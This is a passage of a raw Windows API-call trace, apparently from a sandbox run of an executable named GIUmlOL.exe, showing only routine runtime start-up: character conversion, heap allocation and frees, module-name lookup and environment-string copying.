\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0077.784] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0077.784] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1000) returned 0x5870f0 [0077.785] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0077.785] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0077.785] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0077.785] AreFileApisANSI () returned 1 [0077.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0077.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xcd) returned 0x574860 [0077.785] GetEnvironmentStringsW () returned 0x588100* [0077.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4e6) returned 0x588ae0 [0077.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x588ae0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0077.785] FreeEnvironmentStringsW (penv=0x588100) returned 1 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x118) returned 0x579c90 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1f) returned 0x57b290 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x574fa0 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x574fe0 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x580810 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x575020 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x14) returned 0x575060 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x57b530 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd) returned 0x573fb0 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0x57b2c0 [0077.785] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x31) returned 0x573eb0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x15) returned 0x579900 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x574090 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xe) returned 0x5725f0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x69) returned 0x573ef0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x580180 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1d) returned 0x57b2f0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x5803b0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x573f70 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x18) returned 0x57ba20 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1b) returned 0x57b410 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x57b320 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0x57ba40 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x57b6b0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6b) returned 0x57ba80 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x17) returned 0x578d00 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xf) returned 0x578d20 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0x578d40 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x588250 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x29) returned 0x588210 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x578d60 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x21) returned 0x57b590 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x16) returned 0x589340 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x22) returned 0x57b3b0 [0077.786] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x12) returned 0x589240 [0077.786] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588ae0 | out: hHeap=0x570000) returned 1 [0077.787] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa3a7) returned 0x5893e0 [0077.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b380 [0077.788] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa3a7) returned 0x593790 [0077.789] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.789] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfef7) returned 0x59db40 [0077.791] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x580360 [0077.791] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfef7) returned 0x5ada40 [0077.829] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b380 | out: hHeap=0x570000) returned 1 [0077.829] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59db40 | out: hHeap=0x570000) returned 1 [0077.830] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x450) returned 0x588910 [0077.831] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x450) returned 0x5bd940 [0077.831] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.831] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1ea7) returned 0x5bdda0 [0077.831] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xf40) returned 0x5893e0 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x7a0) returned 0x58a330 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bdda0 | out: hHeap=0x570000) returned 1 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xbf0) returned 0x5893e0 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58a330 | out: hHeap=0x570000) returned 1 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x640) returned 0x588910 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1247) returned 0x5bd940 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x520) returned 0x588910 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1b56) returned 0x5893e0 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.832] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8a0) returned 0x5bd940 [0077.832] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x28ed) returned 0x58af40 [0077.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x550) returned 0x588910 [0077.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2537) returned 0x5bd940 [0077.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12b7) returned 0x5893e0 [0077.833] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x950) returned 0x58d840 [0077.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.833] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3d4f) returned 0x58e1a0 [0077.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58af40 | out: hHeap=0x570000) returned 1 [0077.834] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58d840 | out: hHeap=0x570000) returned 1 [0077.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2377) returned 0x5bd940 [0077.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11d7) returned 0x591f00 [0077.834] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8e0) returned 0x5893e0 [0077.835] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.835] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x591f00 | out: hHeap=0x570000) returned 1 [0077.835] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5b0) returned 0x588910 [0077.835] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x640) returned 0x588910 [0077.835] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5be2) returned 0x59db40 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58e1a0 | out: hHeap=0x570000) returned 1 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x890) returned 0x5bd940 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xac0) returned 0x5bd940 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b380 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x960) returned 0x5bd940 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x960) returned 0x5be2b0 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x460) returned 0x588910 [0077.836] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe0f) returned 0x5bec20 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be2b0 | out: hHeap=0x570000) returned 1 [0077.836] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1c17) returned 0x5a3730 [0077.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xe00) returned 0x5bd940 [0077.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x700) returned 0x5a5350 [0077.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0077.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.837] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x153d) returned 0x5a3730 [0077.837] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bec20 | out: hHeap=0x570000) returned 1 [0077.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5350 | out: hHeap=0x570000) returned 1 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2277) returned 0x5bd940 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1157) returned 0x5a4c80 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8a0) returned 0x5a5de0 [0077.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4c80 | out: hHeap=0x570000) returned 1 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1fc7) returned 0x5bd940 [0077.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0077.838] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5de0 | out: hHeap=0x570000) returned 1 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1657) returned 0x5a3730 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xb20) returned 0x5a4d90 [0077.838] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x590) returned 0x5bf910 [0077.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0077.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a4d90 | out: hHeap=0x570000) returned 1 [0077.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2f96) returned 0x5a3730 [0077.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bf910 | out: hHeap=0x570000) returned 1 [0077.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2b47) returned 0x5a66d0 [0077.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x15b7) returned 0x5bd940 [0077.839] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xad0) returned 0x5bef00 [0077.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a66d0 | out: hHeap=0x570000) returned 1 [0077.839] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bef00 | out: hHeap=0x570000) returned 1 [0077.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2697) returned 0x5a66d0 [0077.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1367) returned 0x5bd940 [0077.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9a0) returned 0x5becb0 [0077.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a66d0 | out: hHeap=0x570000) returned 1 [0077.840] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.840] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x474d) returned 0x5a66d0 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a3730 | out: hHeap=0x570000) returned 1 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5becb0 | out: hHeap=0x570000) returned 1 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x920) returned 0x5bd940 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1b47) returned 0x5bd940 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xd90) returned 0x5aae30 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6d0) returned 0x5bf490 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5aae30 | out: hHeap=0x570000) returned 1 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bf490 | out: hHeap=0x570000) returned 1 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x5d0) returned 0x588910 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6adf) returned 0x5893e0 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a66d0 | out: hHeap=0x570000) returned 1 [0077.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1887) returned 0x5bd940 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xc30) returned 0x5bf1d0 [0077.841] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x620) returned 0x588910 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bf1d0 | out: hHeap=0x570000) returned 1 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.842] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8f0) returned 0x5bd940 [0077.842] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x480) returned 0x588910 [0077.842] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x240) returned 0x5be240 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5be240 | out: hHeap=0x570000) returned 1 [0077.842] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x580590 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b380 | out: hHeap=0x570000) returned 1 [0077.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59db40 | out: hHeap=0x570000) returned 1 [0077.843] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.843] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580590 | out: hHeap=0x570000) returned 1 [0077.843] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9900) returned 0x5893e0 [0077.843] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1bf0) returned 0x5bd940 [0077.845] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.845] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9937) returned 0x59db40 [0077.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.846] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b380 [0077.846] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9900) returned 0x5893e0 [0077.846] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x1bf0) returned 0x5bd940 [0077.847] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0077.847] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9937) returned 0x5bd940 [0077.848] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5893e0 | out: hHeap=0x570000) returned 1 [0077.849] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40) returned 0x580950 [0077.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b380 | out: hHeap=0x570000) returned 1 [0077.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x593790 | out: hHeap=0x570000) returned 1 [0077.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ada40 | out: hHeap=0x570000) returned 1 [0077.849] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580360 | out: hHeap=0x570000) returned 1 [0077.849] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5893e0 [0077.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5a7480 [0077.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x8) returned 0x578d80 [0077.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5c7280 [0077.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5892c0 [0077.850] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d80 | out: hHeap=0x570000) returned 1 [0077.850] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5da490 [0077.851] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x18) returned 0x589360 [0077.851] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5892c0 | out: hHeap=0x570000) returned 1 [0077.851] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x5ed6a0 [0077.851] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20) returned 0x57b380 [0077.851] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589360 | out: hHeap=0x570000) returned 1 [0077.851] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x6008b0 [0077.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x30) returned 0x5884d0 [0077.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b380 | out: hHeap=0x570000) returned 1 [0077.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x613ac0 [0077.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x626cd0 [0077.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x48) returned 0x580b80 [0077.852] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5884d0 | out: hHeap=0x570000) returned 1 [0077.852] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x639ee0 [0077.853] RtlAllocateHeap (HeapHandle=0x570000, 